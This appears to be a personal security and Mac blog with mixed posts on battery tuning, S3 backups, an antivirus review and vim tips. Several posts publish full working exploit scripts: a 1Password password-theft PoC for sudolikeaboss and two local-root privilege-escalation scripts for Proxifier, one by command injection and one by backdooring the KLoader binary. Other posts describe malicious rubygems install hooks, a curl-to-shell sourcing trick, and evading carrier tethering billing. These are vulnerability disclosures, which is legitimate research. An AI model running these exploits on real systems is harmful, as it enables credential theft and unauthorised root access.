Get more battery life out of your 2016 MacBook Pro

26 May 2017 08:10

The new MacBook Pros are divisive in many ways, not least of which is the
reportedly less-than-stellar battery life compared to the previous generation.
I bought the "escape" version, which has innately better battery life than the
Touch Bar version, but opted for the i7.  My strategy in the past has always been
to max out the spec as much as I can afford so the machine lasts a long time, but
this time around there isn't a huge difference in performance between the i5 and
the i7.  If you're not doing a lot of intensive processing you may be better
served by the i5.

Anyway, I've found a novel way to get a little bit more battery life out of any
recent mac computer using a kernel extension from an app called "Turbo Boost
Switcher".  You can find it here:

https://github.com/rugarciap/Turbo-Boost-Switcher/tree/master/Turbo%20Boost%20Disabler/DisableTurboBoost.64bits.kext

This kext, when loaded, disables the turbo boost feature of the CPU, causing it
to never exceed its rated clock frequency and thus consume less energy at the
cost of some performance.  This only really makes a noticeable difference if
you're running tasks that would have actually pushed the CPU into boost mode
anyway, but if you want to squeeze every last bit of battery life out of your
new machine it may help.  In my testing with the Intel Power Gadget I found that
even just browsing around websites in Safari or Chrome would frequently push
the CPU over the boost line.

I use an app called ControlPlane - https://www.controlplaneapp.com - to load and
unload the kext when the machine is disconnected from and connected to a power
source.  So on AC power it runs full-tilt; on battery it loads the kext to
maximise battery life.  To get this to work I recommend creating two scripts in
/usr/local/bin, one that disables the turbo (loads the kext) and another that
enables it again (unloads the kext).  Eg:

/usr/local/bin/disable_turbo
--------------------------
#!/bin/bash
/sbin/kextload /usr/local/kexts/DisableTurboBoost.64bits.kext

/usr/local/bin/enable_turbo
--------------------------
#!/bin/bash
/sbin/kextunload /usr/local/kexts/DisableTurboBoost.64bits.kext

Because kexts can only be loaded or unloaded by root, these scripts need to run
with root privileges.  The easiest way to facilitate this is to add entries for
them to your sudoers file so they can be run via sudo without a password, eg:

user ALL=(ALL) NOPASSWD: /usr/local/bin/enable_turbo
user ALL=(ALL) NOPASSWD: /usr/local/bin/disable_turbo

(Replace "user" with your username)

Now in ControlPlane you can use the shell commands:

sudo /usr/local/bin/enable_turbo

and

sudo /usr/local/bin/disable_turbo

to switch the turbo on and off.
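
If you want to sanity-check which state you're currently in, kextstat will tell
you whether the kext is loaded.  A minimal check might look like this (the grep
pattern assumes the kext's bundle identifier contains "DisableTurboBoost", which
may vary between versions):

#!/bin/bash
# rough state check - the grep pattern is an assumption, adjust it if your
# kextstat output names the bundle differently
if kextstat | grep -q DisableTurboBoost; then
  echo "turbo boost is DISABLED (kext loaded)"
else
  echo "turbo boost is ENABLED (kext not loaded)"
fi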

Enjoy the Cylance

11 May 2017 22:08

I blogged about Cylance a couple of times earlier this year after testing their
endpoint security product CylancePROTECT on MacOS.  I ended up deleting both
blog posts shortly after posting them because I was concerned about
inaccuracies in the original post and wanted to give Cylance a chance to
respond to the issues I raised.

Having now tested it for a good few months I think I'm in a good position to
give a fair and honest review of the product.  This post is 100% related to the
MacOS version of CylancePROTECT - I have never tested the Windows version in
any way.

My original post about Cylance highlighted the fact that after installing it I
was able to find some OSX malware samples with a quick google search for "OSX
malware samples" which were not detected by Cylance.  The first result for my
google search was objective-see.com, run by the very awesome Patrick Wardle, an
independent security researcher.  These samples included OSX.Mokes, which was
described in a blog post in September 2016 as a "sophisticated MacOS backdoor":

https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/

Despite being blogged about publicly in early September and known to VirusTotal
not long afterwards, the current release of CylancePROTECT I was using in
February 2017 did not detect OSX.Mokes, along with a couple of other OSX
samples.

I reported this issue to them and was told a couple of weeks later that they had
"taken the issue very seriously", "escalated it internally" and had "updated
their math model" to deal with it.

So I tested Cylance again with the malware and found that it did now
detect it, but only the exact OSX.Mokes binary that I had reported.  If I
changed a single byte (such as a character in one of the C&C domains listed in
the binary) Cylance would no longer detect it.  I again reported this issue to
Cylance and it turned out that although they had updated their math model, the
new model hadn't been released yet.  As an interim measure Cylance had added the
sha256 hash of the binary to a global quarantine list, but this would only work
if it was an exact match.

To be clear on the timeframes here:

- The malware samples in question were known to VirusTotal in the latter part of
  2016.

- The undetected samples were reported to Cylance in early February 2017 - still
  undetected despite being in VirusTotal for at least 3 months

Around April 20th 2017 the Infinity Engine (Cylance's cloud service) was updated
with the new math model.  Unfortunately this doesn't really provide much
protection - if a modified version of OSX.Mokes is scanned by Cylance it will
initially not detect it, even if the modification is only a single byte.  If the
policy on the endpoint has auto-upload enabled it will upload previously unseen
binaries to Infinity.  Some time later the Infinity Engine, with its new math
model, will classify the binary as bad and this will get picked up by the local
user's Cylance agent.  However the time this takes is such that a user could
easily have executed the binary and become compromised in the meantime.

At the time of writing, 11th May 2017 9pm BST, I still don't have the updated
math model that detects OSX.Mokes other than via a static sha256 hash.
Modified versions of it will eventually get picked up and blacklisted by the
InfinityEngine but this is a fairly weak defence.  Even free signature scanners
like ClamAV are able to detect modified versions of Mokes that still contain
the same signature.

More recently the handbrake.fr website was hacked and the application was
implanted with a piece of malware called Proton.B.  I tested the sample with the local
agent I have and found that Cylance did not detect it.  Additionally, uploading
it to the Infinity Engine also did not result in detection, so the new math
model that is pending release to local agents still doesn't pick it up.
Admittedly at the time I tested this the traditional signature scanners weren't
detecting it either but this is where Cylance is meant to be superior.

This is Patrick Wardle's post about this attack:

https://objective-see.com/blog/blog_0x1D.html

At least this time Cylance were aware of the issue internally and are working to
resolve it.

Another recent MacOS malware development is a new variant of the Dok malware.
Dok.A is detected by Cylance but Dok.B is not.  Cylance sells itself exactly on
this kind of detection - variants and mutations of pre-existing malware - but
here it is failing to do exactly what it is marketed to do.

ref: https://twitter.com/objective_see/status/859240059471638528

Another instance of Cylance failing to do its job was when I recently discovered
an RCE vulnerability in a popular virtualisation product.  I can't give details
yet because the vendor hasn't patched it but essentially it allows a vector for
injecting a malicious dylib.  I quickly knocked up a dylib that had no actual
library code but just a constructor that initiates a reverse tcp shell
connection to the attacker on a pre-determined IP address.  When compiled this
was not detected by Cylance as malicious at all, despite it being a library with
a) no library code and b) an obviously malicious constructor.  The reason for
putting the payload in the constructor is that this gets called as soon as the
library is loaded into the parent process so there's no need to wait for it to
actually call a specific function in the library.
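
For anyone unfamiliar with the constructor trick, here's a rough and deliberately
harmless sketch of the same shape of dylib - the payload is replaced with a print
statement and the filenames are made up for the example:

poc_dylib.sh
--------------------------
#!/bin/bash
# builds a dylib whose constructor runs the moment the library is loaded
# into a process - no exported function ever needs to be called

cat > poc.c <<'EOF'
#include <stdio.h>
#include <unistd.h>

/* runs automatically at load time */
__attribute__((constructor))
static void poc_init(void)
{
  /* a real payload (e.g. a reverse tcp shell) would go here */
  fprintf(stderr, "constructor fired in pid %d\n", getpid());
}
EOF

gcc -dynamiclib -o poc.dylib poc.c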

So, all this negativity and failure... at this point, if you're still reading, you
probably think I don't think very highly of Cylance or their product.
Surprisingly, that's not the case.  I actually think CylancePROTECT is a pretty
cool product despite its apparent ineffectiveness as an antivirus solution.

In the media and even in Cylance's own marketing the focus is on AV, and
understandably so, but it does more than just AV.  As well as the
machine-learning AV engine CylancePROTECT also provides memory exploit
protection and is able to stop a long list of memory exploitation techniques.
It's simple to test the effectiveness of these - grab Metasploit and try running
some MacOS memory corruption exploits.  I quickly found that Cylance blocked
them purely based on behaviour rather than statically analysing the binary.

It's worth mentioning as well that the malware binaries Cylance did detect could
be modified extensively without breaking the detection.

I'm a pretty competent computer user and don't really need antivirus in any
form; the only reason I ever run it is because it's required by the corporate
policies of clients I work with when I'm on site.  I know what malware
looks like and what not to open, so regardless of the effectiveness of the AV
I'm probably not going to get owned like that (although handbrake.fr getting
owned is a potential and worrying vector!).  0day exploits however are a
different thing entirely and having something that can actually defend against
this kind of attack is pretty cool.  Some of the incumbent AV products claim
to defend against this but as far as I can tell it's all just based on
reacting to known threats and releasing signatures as fast as possible.
Technologies like Bromium look like a really cool way to defend against exploits
but they're not available to end users or even SMBs running MacOS yet.

Cylance also has some pretty clever and well thought out protection against a
local user disabling or bypassing the agent.  With a "completely locked down"
policy I have been unable to disable the agent even as root - despite a lot of
effort spent trying.  The kernel driver disallows access to pretty much every
file related to Cylance and blocks all signals to its processes.

To summarise I think Cylance is cool tech and I hope that it gets better on
MacOS over the next year or two.  Given how much Cylance is valued at I'm
willing to believe that the Windows version is way more effective at AV than the
Mac version but I don't really care enough about Windows to test it.  It would
stand to reason though - there's likely much more Windows malware to train the
ML algorithm with and a much bigger market to motivate the company.

I'd like to see Apple implement some of Cylance's memory protection techniques
into the kernel but I'm not holding my breath as they're clearly not very
focused on security.

If you know what you're doing with computers, are unlikely to click on a dodgy
attachment and work in an industry that could be deliberately targeted by
attackers, you might want to add CylancePROTECT to your defences.

I would also highly recommend BlockBlock by Patrick Wardle for Mac users looking
for additional protection.  BlockBlock was able to detect and block Proton.B
from persisting itself when neither the traditional AV products nor CylancePROTECT
were able to.  And it's free!

sudolikeaboss allows password theft

3 May 2017 13:12

sudolikeaboss is a neat little program that acts as a command-line interface to
1Password Pro, effectively giving you a way to use 1password with the terminal.

This is useful but it does come with a security tradeoff as any application
running in the context of the user can potentially steal passwords if 1password
is in an unlocked state.

This isn't so much of an issue with the official browser extension as there's no
way for a malicious website to invoke AppleScript or execute arbitrary code.

I don't want to overstate this as it's a fairly limited exploit - it only works
if 1password is unlocked and the screen isn't locked, meaning the user will
almost certainly be aware that it's happened.  Also it requires the attacker to
be able to execute code on the machine in the first place, but a user tricked
into running such a malicious application could potentially have multiple
account passwords stolen.  A carefully orchestrated spearphishing attack could
combine this with automated password changes to lock the victim out of their
accounts.

The exploit below demonstrates how sudolikeaboss can be abused using AppleScript
to steal the first result of a quick search for a string within 1password.  Use
a parameter like "gmail" or "twitter" to see how quickly it can steal your
passwords.

https://m4.rkw.io/sudolikeyoureowned.sh.txt
-------------------------------------------
#!/bin/bash

####################################################
# sudolikeaboss 0.3.0-beta1 password theft exploit #
####################################################
# by m4rkw,  shouts to #coolkids :P                #
####################################################

# sudolikeaboss is very convenient but convenience is often a tradeoff
# for security.  This PoC demonstrates password theft when 1password
# is in an unlocked state.
#
# The parameter will be used to search 1password and return the first
# matching result.  A good choice would be "twitter" or "gmail".

if [ "$1" == "" ] ; then
  echo "Usage: $0 <1password search string>"
  exit 0
fi

cat > sudo_as.txt <<EOF
delay 0.3
tell application "System Events"
EOF

echo "$1" | fold -w1 |sed 's/^/  keystroke "/g' |sed 's/$/"/g' >> sudo_as.txt

cat >> sudo_as.txt <<EOF
  delay 0.5
  key code 36
end tell
EOF

osacompile -o sudo_as.scpt sudo_as.txt

osascript "./sudo_as.scpt" &

pass=`sudolikeaboss`

echo "Password stolen: $pass"

CVE-2017-7690 Local root privesc in Proxifier for Mac 2.19

11 Apr 2017 20:57

With CVE-2017-7643 I disclosed a command injection vulnerability in the KLoader
binary that ships with Proxifier <= 2.18.

Unfortunately 2.19 is also vulnerable to a slightly different attack that
yields the same result.

When Proxifier is first run, if the KLoader binary is not suid root it gets
executed as root by Proxifier.app (the user is prompted to enter an admin
password).  The KLoader binary will then make itself suid root so that it
doesn't need to prompt the user again.

The Proxifier developers added parameter sanitisation and kext signature
verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app
does no verification of the KLoader binary that gets executed as root.

The directory KLoader sits in is not root-owned, so we can replace the binary
with our own, which will get executed as root when Proxifier starts.

To avoid raising any suspicion, as soon as we are executed as root we can swap
the real KLoader binary back into place and forward the execution call on
to it.  This does require the user to re-enter their credentials the next time
Proxifier is run, but it's likely most users wouldn't think anything of this.

Users should upgrade to version 2.19.2.

https://m4.rkw.io/proxifier_privesc_219.sh.txt
3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac
-------------------------------------------------------------------

#!/bin/bash

#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.19                                           #
#####################################################################
# by m4rkw,  shouts to #coolkids :P                                 #
#####################################################################

cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
  setuid(0);
  seteuid(0);

  execl("/bin/bash", "bash", NULL);
  return 0;
}
EOF

gcc -o /tmp/a a.c

cat > a.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main(int ac, char *av[])
{
  if (geteuid() != 0) {
    printf("KLoader: UID not set to 0\n");
    return 104;
  } else {
    seteuid(0);
    setuid(0);

    chown("/tmp/a", 0, 0);
    chmod("/tmp/a", strtol("4755", 0, 8));
    rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader");
    chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);
    chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8));
    execv("/Applications/Proxifier.app/Contents/KLoader", av);

    return 0;
  }
}
EOF

mv -f /Applications/Proxifier.app/Contents/KLoader /Applications/Proxifier.app/Contents/KLoader2
gcc -o /Applications/Proxifier.app/Contents/KLoader a.c
rm -f a.c

echo "Backdoored KLoader installed, the next time Proxifier starts /tmp/a will become suid root."

-------------------------------------------------------------------

CVE-2017-7643 Local root privesc in Proxifier for Mac <= 2.18

10 Apr 2017 21:19

Proxifier 2.18 (also 2.17 and possibly some earlier versions) ships with a
KLoader binary which it installs suid root the first time Proxifier is run. This
binary serves a single purpose which is to load and unload Proxifier's kernel
extension.

Unfortunately it does this by taking the first parameter passed to it on the
commandline without any sanitisation and feeding it straight into system().

This means not only can you load any arbitrary kext as a non-root user but you
can also get a local root shell.

Although this is a bit of a terrible bug that shouldn't be happening in 2017,
Proxifier's developers fixed the issue in record time so that's something!

Everyone using Proxifier for Mac should update to 2.19 as soon as possible.

https://m4.rkw.io/proxifier_privesc.sh.txt
6040180f672a2b70511a483e4996d784f03e04c624a8c4e01e71f50709ab77c3
-------------------------------------------------------------------

#!/bin/bash

#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.18                                           #
#####################################################################
# by m4rkw                                                          #
#####################################################################

cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
  setuid(0);
  seteuid(0);

  execl("/bin/bash", "bash", NULL);
  return 0;
}
EOF

gcc -o /tmp/a a.c
rm -f a.c
/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a'
/tmp/a

-------------------------------------------------------------------

Making sure your S3 backup worked

4 Jan 2017 18:21

As a follow-up to my previous post about making immutable S3 backups using
Lambda, this is an additional Lambda function you can use to verify that your
backup actually ran.

You'll want to configure it to run at around 10-15mins past the hour so the
backup has some time to complete.  It will look for the backup files that should
exist and send an email if they don't.

https://m4.rkw.io/lambda2.py
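
If you'd rather spot-check by hand, something like the following also works,
assuming the aws cli is configured and the bucket/key naming scheme from the
previous post:

# today's nightly tarball and the current hourly SQL snapshot
aws s3 ls s3://backups2/$(date +%Y-%m-%d).tar.gz.gpg
aws s3 ls s3://backups2/$(date +%Y-%m-%d).$(date +%H).sql.gz.gpg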

Using lambda to make immutable S3 backups

2 Jan 2017 17:55

S3 is really handy for server backups and at $0.023/GB/month it's incredibly
cost-effective.

However the default way most people use it is to simply spray their data
directly into an S3 bucket from the machine they're backing up.  This works fine
right up until you get hacked by someone malicious who then has the ability to
trash all of your backups from the machine that has access to the bucket.

Enter lambda, Amazon's magic function-in-the-sky service that allows you to do
serverless computation.

This post describes how to secure your backups using a lambda function.

Scenario: a server that creates nightly tarball backups of around 5GB and
hourly SQL snapshots of around 250MB.

We will create two S3 buckets - backups1 and backups2.

The server will have write access to backups1 but no access to backups2.
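
How you grant that access is up to you, but as a rough sketch (the user name and
policy name below are just made up for the example), an IAM policy limited to
uploads into backups1 might look like:

aws iam put-user-policy --user-name backup-writer \
  --policy-name backups1-write-only \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Action": ["s3:PutObject"],
      "Resource": "arn:aws:s3:::backups1/*"
    }]
  }'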

The process the backups will follow is:

1. The server will execute its backup and write a file to backups1 called
backup.tar.gz.gpg.  This might be done with a cron job along the lines of:

/bin/tar -cP /data | /bin/gzip | \
  /usr/bin/gpg --no-use-agent --no-tty --passphrase-file /root/key --cipher-algo AES256 -c | \
  /usr/local/bin/s3cmd put - s3://backups1/backup.tar.gz.gpg

2. Any writes to the backups1 bucket will trigger this lambda function:

https://m4.rkw.io/lambda.py

3. The lambda function checks the name of the uploaded object.  If it's
backup.tar.gz.gpg it will check for a file in the backups2 bucket called
{YYYY-mm-dd}.tar.gz.gpg.  If the file doesn't exist then it will move
backup.tar.gz.gpg from backups1 to backups2 using the timestamped filename.
If it already exists it will do nothing - this prevents backups from being
overwritten once created.

4. The lambda function also handles hourly sql snapshots - if the uploaded file
is called sql.gz.gpg it will look for an object called
{YYYY-mm-dd}.{HH}.sql.gz.gpg.  Again if the file doesn't exist it will move the
uploaded file to backups2 using the timestamped name.

Because the filenames are determined by the lambda function which cannot be
changed by the server, an attacker breaking into the server has no way to
destroy any previously created backups.  This is a lot more secure than simply
writing the data straight into S3 from a server that has full access to the
target bucket.

Note that because the backup archives are written based on timestamps you must
set the timezone in the lambda function to the timezone of your server to avoid
issues.

You will probably also want to create a lifecycle policy for your backups2
bucket to delete the backups after a certain time period or archive them to
glacier long term storage.
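
For example - the rule name and retention periods here are arbitrary, so adjust
to taste - a lifecycle configuration that moves backups to Glacier after 30 days
and expires them after a year can be applied with the aws cli:

aws s3api put-bucket-lifecycle-configuration --bucket backups2 \
  --lifecycle-configuration '{
    "Rules": [{
      "ID": "age-out-backups",
      "Filter": {"Prefix": ""},
      "Status": "Enabled",
      "Transitions": [{"Days": 30, "StorageClass": "GLACIER"}],
      "Expiration": {"Days": 365}
    }]
  }'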

How to get vi keybindings in bash and the MySQL client

11 Dec 2016 19:22

The vim keybindings are wonderful once you get used to them.

What some people don't know is that the same keybindings are available in other
programs, for example bash has a "vi mode" which can be enabled with:

set -o vi

Once enabled you can hit escape and get the familiar keybindings to edit the
commandline.

The MySQL client also has a vi mode which can be enabled by placing the following
into your ~/.inputrc:

set editing-mode vi


With these tricks the power of vim need not be constrained solely to the editor.

How to create a bootable FileVault2-encrypted SuperDuper! clone

11 Dec 2016 13:11

SuperDuper! from Shirt Pocket software is a fantastic backup utility.  It lets you
create a full bootable clone of your mac that you can boot on any machine.

Not only is this a great way to back up your data but if your main machine dies
you can plug the backup drive into any mac, boot from it using the option key
at startup and be straight back into your environment.

SuperDuper! doesn't natively support FileVault but there is a workaround you can
use.  It's a bit cumbersome to set up but once done it works really well.

1. First create a full SuperDuper clone of your main drive as normal onto an
unencrypted volume.

2. Boot from the external disk into the cloned environment.

3. Reinstall MacOS in the cloned environment.  This is necessary in order to
create the hidden partitions that allow FileVault to work.

4. After the install has finished, boot again into the cloned environment
and enable FileVault.  You don't need to wait for it to finish encrypting.

5. Reboot into the main mac environment.

6. The FileVault encryption process will continue in the background whenever the
drive is mounted, but if you want to ensure all the files are encrypted as soon
as possible I recommend the following:

6.1. Delete all the files from the backup drive.

6.2. Run SuperDuper again from the main mac drive to the backup drive.
Since FileVault is now enabled they will be automatically encrypted as they
are written.

Once this finishes you now have a fully bootable clone of your mac that you
can update with SuperDuper as necessary.
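
If you want to keep an eye on how far the background encryption has got, diskutil
will report the conversion status of the encrypted volume (this assumes a
CoreStorage-based FileVault volume; on newer APFS disks the equivalent would be
"diskutil apfs list"):

diskutil cs list    # look for the Conversion Status / progress lines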

linux/vim lifehack: sourcing a temporary local environment

10 Dec 2016 17:18

If you're a vim fanboy like me you may often find it frustrating when logging into
another machine that the default vim config isn't very nice to use.  Sometimes the
remote machine has a shared user account so changing it to your liking isn't really
practical.

To work around this and make my life easier I created this:

https://a.rkw.io/env-nonstatic

which I can source from any linux machine to instantly give me a sane but still
temporary vim config.  It first sources the .bash_profile so we have anything that
we might need from there, then processes all of my personal environment config.
Vim is aliased to load a temporary config file stored in /tmp so I can use my own
config for the remainder of the session without affecting other users.
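
The vim part boils down to something roughly like this - paraphrased rather than
lifted from the actual script, with placeholder settings:

# write a throwaway vimrc and point vim at it for this session only
cat > /tmp/.vimrc.$USER <<'EOF'
set nocompatible
syntax on
set expandtab shiftwidth=2 tabstop=2
EOF

alias vim="vim -u /tmp/.vimrc.$USER"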

To make this even more useful I use the awesome program TextExpander from Smile
Software which allows you to make system-wide keyboard snippets that expand into
useful macros.  So now all I have to type on any linux machine I log into is:

;env

and it will automatically expand to:

. <(curl https://a.rkw.io/env-nonstatic 2>/dev/null)

and it even presses enter for me :)  How cool is that?

Ruby gems can execute code as root while they're being installed

29 May 2016 18:07

Another hilarious and trivial rubygems exploit.  The file ext/<ext>/extconf.rb
gets executed during installation - as root if the gem is installed with sudo, as
in the demo below.  A malicious gem could put code in there that installs a
backdoor.

Demonstration PoC: https://github.com/m4rkw/rubygems-poc2

$ ls -la /tmp/lol
ls: cannot access /tmp/lol: No such file or directory
$ sudo gem install file-4.3.2.gem
Building native extensions.  This could take a while...
Successfully installed file-4.3.2
Parsing documentation for file-4.3.2
Done installing documentation for file after 0 seconds
1 gem installed
$ /tmp/lol
# id
uid=0(root) gid=1000(mark) groups=0(root),1000(mark),1003(admin)
#

Again, be *very* careful what gems you install!

Abusing rubygems for fun and profit

29 May 2016 12:18

RubyGems is a nice system, very easy to use and also easy to abuse.  Anyone can push
a gem straight into the global namespace, even if the gem has the same name as a core
library.

This can be trivially abused to break into systems of anyone who isn't very careful
what gems they use (and let's be honest, that's probably a lot of developers :).

Ruby gems can include executable scripts which get installed into /usr/local/bin/.
On Ubuntu, Centos and probably most other linux distros, /usr/local/bin takes precedence
over /bin, /usr/bin, /sbin etc.  This means we can drop a fake "ls" script into
/usr/local/bin/ which will get executed every time the user types ls.
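
You can see the precedence for yourself on any given box (assuming bash):

type -a ls     # every ls on the PATH, in the order bash will pick them
echo $PATH     # /usr/local/bin normally appears before /bin and /usr/bin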

A PoC for this can be found here: https://github.com/m4rkw/rubygems-poc

Once installed the fake ls binary takes precedence and can then silently run whatever
malicious code you like (eg a connect-back shell to a remote system) before passing
the args onto the real ls.

The PoC just prints a silly message.

    $ ls
    bin  file-4.3.2.gem  file.gemspec  lib  LICENSE  README
    $ sudo gem install file-4.3.2.gem
    Successfully installed file-4.3.2
    Parsing documentation for file-4.3.2
    Installing ri documentation for file-4.3.2
    Done installing documentation for file after 0 seconds
    1 gem installed
    $ ls
    /============\
    | LOL HAXXED |
    \============/
    bin  file-4.3.2.gem  file.gemspec  lib  LICENSE  README
    $

At the time of writing the "file" gem name isn't taken so anyone could push a gem
straight into rubygems that would be installed whenever anyone types "gem install file".
This could easily catch someone out if they don't realise that the File class is built-in
rather than provided by a gem.

Another vector would be creating a small gem that actually does something useful and
just waiting for people to install it.  I wrote a simple Transmission API library and got
hundreds of downloads.


Conclusions
===========

Since there's very little inherent security it seems the onus is on developers to be
careful what gems they install.  However since most gems don't need to install executables
it would probably be sensible for the rubygems maintainers to make the "gem" command
explicitly warn users if they're installing an executable.

Tethery - bypass iOS tethering restrictions

12 Nov 2015 12:28

I decided to roll my tethering bypass idea into a script to make it easy to use.

This script automates the fiddly configuration bits and gives you a quick way to throw up a
proxy that will bypass tethering restrictions on iOS.

It also disables the carrier's ability to detect that you're tethering because all they can see
is a single SSH connection, meaning they can't bill you for a separate tethering data allowance.

https://github.com/m4rkw/tethery

How to bypass tethering restrictions on iOS

24 Oct 2015 11:26

It's often annoying that Apple lets carriers disable tethering at will, especially when the
carrier has already sold you "unlimited" data.  Three allow free data when roaming in
"feel at home" countries but they don't allow tethering at all, even if you're willing to
pay for it.

After being irritated by these restrictions on several holidays I decided to fix the problem
once and for all.

Turns out it's really simple: you can just create an ad-hoc wifi network between your iphone
and computer, use vSSH to connect to a remote server and spawn a local socks5 proxy, then
use Proxifier on the mac to route all the traffic over the proxy.

This works even if "personal hotspot" isn't available and has the added bonus of completely
hiding the fact that you're tethering from the carrier, as all they can see is the ssh
traffic, so they can't bill you separately for the tethering data. :)
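
For reference, what vSSH is doing on the phone is just an SSH dynamic forward bound to the
ad-hoc interface.  The desktop OpenSSH equivalent would be something along these lines (the
IP and port are only examples):

ssh -N -D 169.254.1.10:1080 user@your-remote-server
# then point Proxifier at 169.254.1.10:1080 as a SOCKS5 proxy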

Siri in the car is awesome

15 Oct 2015 22:11

I've always been fairly cynical about Siri.  It seemed more like a gimmick than something people would use seriously
in their day to day lives, but I've recently discovered how wrong I was.

I don't have a CarPlay stereo in my car, because I didn't want to be tied into Apple's apps.  Maps is nowhere near
as good as TomTom (which I also paid good money for) and TomTom doesn't yet have Siri integration.  But I never
even considered that Siri would work with non-CarPlay stereos.  Turns out, as my friend and colleague Paul
mentioned to me in passing, that it does.  I have a Kenwood aftermarket stereo and if I hold the Call button on
the unit, it activates Siri.

It seems to know I'm in the car, so lots of potentially useful requests are denied with "Sorry Mark, I can't do
that while you're in the car", which is a bit annoying, but on the whole it's very useful.  Things that work include:

- Playing music (playlists, songs etc)
- Playing podcasts (only works with the official Podcasts app)
- Switching between music and podcasts
- Reading emails/messages
- Sending emails/messages
- Setting reminders
- Navigation (but only with apple maps)
- Making calls

Just the ability to set reminders while I'm driving, or text my wife when I'm nearly home, is magical.

How to do a fresh installation of iOS 9 without losing data

31 Aug 2015 22:23

Despite Apple's best efforts, there are nearly always a number of users who experience issues after a major iOS
update.  Users might experience crashes, unusually high battery drain, slowness etc etc.

Whenever I upgrade to a major iOS release I usually do a fresh reinstall of iOS.  Although Apple provides no
official way to do this without losing all of your data, it is possible using a third party tool called
iBackupBot which I highly recommend:

http://www.icopybot.com/itunes-backup-manager.htm

Disclaimer

Although this worked for me I take no responsibility for this whatsoever - if you lose data or brick your
device it's entirely your own fault.  PROCEED AT YOUR OWN RISK!

What this does

This will reset all of the settings for your device, but allow you to retain the data for your apps and your
SMS and call histories.  Most of the glitches with major iOS updates are likely due to things like settings
schemas changing which then cause the newly updated device to get confused and possibly get stuck in a loop
causing battery drain.

Steps:

1. Install iOS9 and restore your backup as you normally would.

2. Take a backup in iTunes, go to the MobileSync directory, tar it up and copy it somewhere safe just in case.

3. Close iTunes and open iBackupBot. Open the backup that you just took on the left, you'll see these folders
underneath it:

- System Files
- User App Files
- App Group Files
- App Plugin Files

The first two are the ones we care about.

4. Make a directory on your local machine called "ios data", and underneath that, create "System Files" and
"User App Files".

5. In iBackupBot, click on "System Files" in the left pane, then select all of the directories in the right
pane.  Click Export and choose the "System Files" directory you just created.

6. Repeat step 5 for "User App Files".

At this point you should have a full backup of all of your device's system data (sms, call history etc) and
all the data for your apps.

7. On your device, go to Settings -> General -> Reset -> Erase All Content and Settings.

This will restore your device to bone stock iOS 9.

Note: as of the latest iOS 9 beta there is a bug that after doing this and putting your iCloud account in,
your contacts may not appear.  Don't panic, just go into iCloud settings, turn off Contacts, and then turn
them back on again and they should start appearing.

8. Install all of the apps that have data you need to restore.

9. In iTunes, make sure backup encryption is OFF and take a backup of the device.

10. Close iTunes and open iBackupBot.

Now what you need to do is import the various bits of your backed up data into the fresh backup using the
Import feature.  What you import here depends on what you care about and want to restore, but I would suggest:

- System Files/HomeDomain/Library/CallHistoryDB/*   (call history)
- System Files/HomeDomain/Library/SMS/sms.db  (sms history)
- System Files/MediaDomain/Library/SMS/*   (media from sms history, eg pics and videos)
- System Files/CameraRollDomain/Media/*    (camera roll images)

As well as any data for apps that you care about.  Note that you can import a whole directory by clicking the
down arrow on the Import button and selecting "Import Folder(s)".

Sometimes iBackupBot will show a warning that the paths you've selected may be invalid, just click OK to
continue and ignore this.  The reason it does this is because you're restoring files from the original
backup that aren't currently present in the new backup and it's worried that they might not be valid places
to put files.

Once this is all done, open iTunes, restore the backup to your device and you should find your stuff has
been restored.

Gangsta Lean ruby web framework

18 Aug 2015 22:22

When I started building my new website, I didn't want to be boring and just use
rails so I decided to write my own super-lightweight ruby web framework.

It's powering this website but is quite basic and rough so probably shouldn't be
used by anyone.

https://github.com/m4rkw/lean

I am planning to use it for an upcoming project so it may get fleshed out a bit
more soon.

TVFeed and TransmissionNG

18 Aug 2015 22:17

I've written a couple of ruby gems that people might find useful..

tvfeed - https://github.com/m4rkw/tvfeed

A gem designed to provide a feed of new TV episodes as magnet links from
torrent sites. This is offered purely for research purposes and should suit
those who wish to independently research the availability of popular TV episodes
on torrent sites.

transmission-ng - https://github.com/m4rkw/transmission-ng

A gem providing a better ruby interface to Transmission's RPC API.

Apple Music is not worthy of the Apple brand

1 Jul 2015 16:53

I wanted to like Apple Music, I really really did.  I never really got into Spotify but the hassle of finding new music is a constant problem for me.
As you can see from my music page on this very website, I go through music at a crazy rate.  I've bought over 1500 songs from iTunes over the last few
years and only around 266 are still in my playlist.  Finding new music that I like is a constant struggle and I generally resort to scraping sites like
beatport.com, phonica, blackmarket records etc looking for new stuff.

So today I tried the Apple Music free trial.

The first page was a load of bubbles with the names of musical genres in them. You are apparently supposed to tap the ones you like, and double-tap
the ones you love.  Straight away there was a glaring problem - none of the genres were the music I actually listen to.  99% of my collection is D&B
and dubstep.  The closest approximations were "dance" or "electronic", but I didn't really fancy my chances much with those kind of vague categories.

But it gets worse..



In order to *remove* genres, as you're apparently supposed to do, you have to hold your finger on them for 3 whole seconds WHILE THE FUCKING THING
MOVES AROUND UNDERNEATH IT!  Is Apple making some kind of very poor-taste joke?!

Finally, I managed to select both "dance" and "electronic", disregard the rest, and move to the next section.  Then I was presented with another set
of bubbles for 20 artists I've never heard of.  Why it was presenting these instead of, oh I don't know, the artists I've ACTUALLY BOUGHT MUSIC FROM,
I have no idea.

After rejecting all of these I got another 20 artists that I barely care about.  The only two I even vaguely liked were Prodigy and Nero.  After selecting
these two and killing the rest, I then found that there were no more artists and the next button wouldn't do anything.  There was no obvious indication
why (nice one Apple!) but presumably I hadn't selected enough artists to continue.

